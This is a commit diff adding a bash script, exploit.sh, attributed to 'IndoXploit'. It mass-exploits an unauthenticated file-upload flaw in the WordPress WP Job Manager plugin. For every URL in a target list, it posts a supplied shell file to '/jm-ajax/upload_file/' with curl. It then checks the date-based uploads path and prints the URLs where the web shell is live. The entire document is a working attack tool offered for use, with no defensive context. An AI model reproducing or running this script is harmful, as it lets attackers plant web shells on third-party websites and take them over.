Create exploit.sh

exploit.sh

@@ -0,0 +1,28 @@
+#!/bin/bash
+# Coded by L0c4lh34rtz - IndoXploit
+
+args=("$@")
+target=$(pwd)"/"${args[0]}
+file_=$(pwd)"/"${args[1]}
+tgl=$(date +"%Y")
+bln=$(date +"%m")
+
+if [ -z "$2" ]
+	then
+	echo "usage: wpjob.sh target.txt shell.gif"
+else
+	for url in $(cat $target)
+	do
+		echo "[+] Scanning $url"
+		vuln="$url/jm-ajax/upload_file/"
+		shell="$url/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/"$(basename "$file_")
+
+		curl -s --connect-timeout 10 -k -H "User-Agent: indoxploit" -F "file=@$file_" "$vuln" -o /dev/null
+		check=$(curl -s -k -w "%{http_code}" -H "User-Agent: indoxploit" "$shell" -o /dev/null)
+
+		if (($check == 200))
+			then
+			echo -e "\e[92m$shell\e[0m"
+		fi
+	done
+fi